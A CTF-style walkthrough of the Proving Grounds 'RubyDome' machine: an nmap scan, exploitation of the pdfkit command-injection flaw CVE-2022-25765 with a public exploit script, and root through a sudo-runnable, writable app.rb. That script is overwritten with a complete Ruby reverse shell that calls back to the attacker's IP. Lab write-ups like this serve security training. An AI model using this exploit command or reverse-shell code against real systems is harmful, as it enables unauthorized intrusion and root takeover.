PG - RubyDome

PG – RubyDome

In this walk through, we will be going through the RubyDome room from Proving Grounds. This room is rated as Intermediate on the platform and it consists of exploitation of Ruby application via CVE-2022-25765 for the initial foothold. For Privilege Escalation, abuse of sudo misconfiguration on custom binary is required to get root. So, let’s get started without any delay.

RubyDome

Machine Info:

TitleRubyDome
IPaddress192.168.236.22
DifficultyEasy
OSLinux
DescriptionRubyDome is an Easy Linux machine that requires exploitation of CVE-2022-25765 for the initial foothold and exploitation of sudo misconfiguration on custom binary to get root.

Enumeration:

  • I started off with a regular nmap aggressive scan and found only two ports opened – 22 (SSH) and 3000 (HTTP).

$ sudo nmap -A 192.168.236.22
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-07 22:07 IST

Nmap scan report for 192.168.236.22
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
53/tcp   filtered domain
3000/tcp open     http    WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))
|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
|_http-title: RubyDome HTML to PDF
| vulners: 
|   cpe:/a:ruby-lang:ruby:3.0.2: 
|     	PRION:CVE-2022-28738	7.5	https://vulners.com/prion/PRION:CVE-2022-28738
|     	OSV:BIT-RUBY-2022-28738	7.5	https://vulners.com/osv/OSV:BIT-RUBY-2022-28738
|     	CVE-2022-28738	7.5	https://vulners.com/cve/CVE-2022-28738
|     	PRION:CVE-2021-33621	6.5	https://vulners.com/prion/PRION:CVE-2021-33621
|     	OSV:BIT-RUBY-2021-33621	6.5	https://vulners.com/osv/OSV:BIT-RUBY-2021-33621
|     	CVE-2021-33621	6.5	https://vulners.com/cve/CVE-2021-33621
|     	PRION:CVE-2021-41819	5.0	https://vulners.com/prion/PRION:CVE-2021-41819
|     	PRION:CVE-2021-41817	5.0	https://vulners.com/prion/PRION:CVE-2021-41817
|     	OSV:BIT-RUBY-2021-41819	5.0	https://vulners.com/osv/OSV:BIT-RUBY-2021-41819
|     	OSV:BIT-RUBY-2021-41817	5.0	https://vulners.com/osv/OSV:BIT-RUBY-2021-41817
|     	CVE-2021-41819	5.0	https://vulners.com/cve/CVE-2021-41819
|     	CVE-2021-41817	5.0	https://vulners.com/cve/CVE-2021-41817
|     	PRION:CVE-2022-28739	4.3	https://vulners.com/prion/PRION:CVE-2022-28739
|     	OSV:BIT-RUBY-2022-28739	4.3	https://vulners.com/osv/OSV:BIT-RUBY-2022-28739
|     	CVE-2022-28739	4.3	https://vulners.com/cve/CVE-2022-28739
|     	RUBY:RUBY-2022-28739	0.0	https://vulners.com/rubygems/RUBY:RUBY-2022-28739
|     	RUBY:RUBY-2022-28738	0.0	https://vulners.com/rubygems/RUBY:RUBY-2022-28738
|_    	RUBY:RUBY-2021-33621	0.0	https://vulners.com/rubygems/RUBY:RUBY-2021-33621
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/7%OT=22%CT=1%CU=30033%PV=Y%DS=4%DC=T%G=Y%TM=65C3B1E5
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=109%TI=Z%TS=A)OPS(O1=M54EST1
OS:1NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54
OS:EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T
OS:=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T
OS:2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N
OS:)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=D06B%RUD
OS:=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   199.68 ms 192.168.45.1
2   199.64 ms 192.168.45.254
3   200.26 ms 192.168.251.1
4   200.38 ms 192.168.236.22

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.61 seconds

nmap scan

  • Enumerated the web server running on port 3000 and found out that it is running a Ruby application that converts HTML pages to PDF documents.

RubyDome HTML to PDF

Initial Access:

CVE-2022–25765

  • Upon further exploring for any known exploits for this. Found out that the target is running the pdfkit package that is vulnerable to CVE-2022–25765 which is a Command Injection vulnerability leading to RCE. Used the below exploit specifying the target URL and our listener port and IP. Once the exploit execution is complete, we will receive a reverse connection back at our netcat listener.

Exploit: https://github.com/UNICORDev/exploit-CVE-2022-25765

python3 exploit-CVE-2022-25765.py -s 192.168.45.215 4444 -w http://192.168.236.22:3000/pdf -p url

firing exploit

got initial access

  • Captured the local flag.

local flag

Privilege Escalation:

  • Next, enumerated the sudo misconfiguration with the below command and found out that we can run the app.rb script as root without any password.

sudo -l

sudo -l

  • I checked the permissions for the app script and found out that we can write to it. So, changed the contents of the script with the below reverse shell code.

nano app.rb

#!/usr/bin/env ruby

require 'socket'
require 'open3'

#Set the Remote Host IP
RHOST = "192.168.45.215" 
#Set the Remote Host Port
PORT = "1234"

#Tries to connect every 20 sec until it connects.
begin
sock = TCPSocket.new "#{RHOST}", "#{PORT}"
sock.puts "We are connected!"
rescue
  sleep 20
  retry
end

#Runs the commands you type and sends you back the stdout and stderr.
begin
  while line = sock.gets
    Open3.popen2e("#{line}") do | stdin, stdout_and_stderr |
              IO.copy_stream(stdout_and_stderr, sock)
              end  
  end
rescue
  retry
end 

app.rb

  • Once we execute the target binary using sudo, we will receive a reverse connection back at my netcat listener as root.

sudo /usr/bin/ruby /home/andrew/app/app.rb

executing the target binary

got root

  • Finally, captured the root flag and marked the machine as complete.

proof flag

Also Read: PG – pyLoader

Conclusion:

Conclusion

So that was “RubyDome” for you. We started off with a regular nmap scan and found two ports opened – 22 (SSH) and 3000 (HTTP). Enumerated the web server running on port 3000 and found out that it is running a Ruby application that converts HTML pages to PDF documents. Upon further exploring for any known exploits for this. Found out that the target is running the pdfkit package that is vulnerable to CVE-2022–25765 which is a Command Injection vulnerability leading to RCE. Used the same to get initial access on the target. For Privilege Escalation, sudo misconfiguration on custom binary was abused to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top